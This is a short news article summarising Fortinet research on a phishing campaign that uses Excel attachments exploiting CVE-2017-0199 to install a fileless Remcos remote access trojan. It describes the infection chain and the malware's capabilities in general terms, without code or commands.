A new malware that has become increasingly widespread in recent times is stored directly in Excel files. According to Fortinet research, malicious actors are spreading a fileless version of the Remcos Remote Access Trojan (RAT) using Excel documents. The goal of this new malware is, unsurprisingly, to capture users’ sensitive information.

The new attack method starts by sending phishing emails with fake purchase orders to get users’ attention. The email attachment contains an Excel file that exploits a vulnerability in the Microsoft Office application known as CVE-2017-0199.

How does the new attack method come about?

When this file is opened, the system downloads an HTML application file (HTA) from a remote server and launches this file using the mshta.exe utility. As a result of this process, a second payload is downloaded from the server and this payload prevents debug analysis and detection, allowing the Remcos RAT to be installed.

Remcos RAT was not originally developed as pirated software. It was initially developed to be used legally for tasks such as remote management, but like Cobalt Strike it was seized by malicious people and began to be used for malicious activities.

What can Remcos RAT do?

Today, Remcos has become a tool used for unauthorized access, data theft and espionage. Keyboard movements on a Remcos RAT infected computer can be recorded, screenshots taken and commands executed.

The Remcos version used in the new method has a fileless structure. Fortinet claims that attackers insert Remcos directly into the target device’s memory. So it is not easily noticed or detected.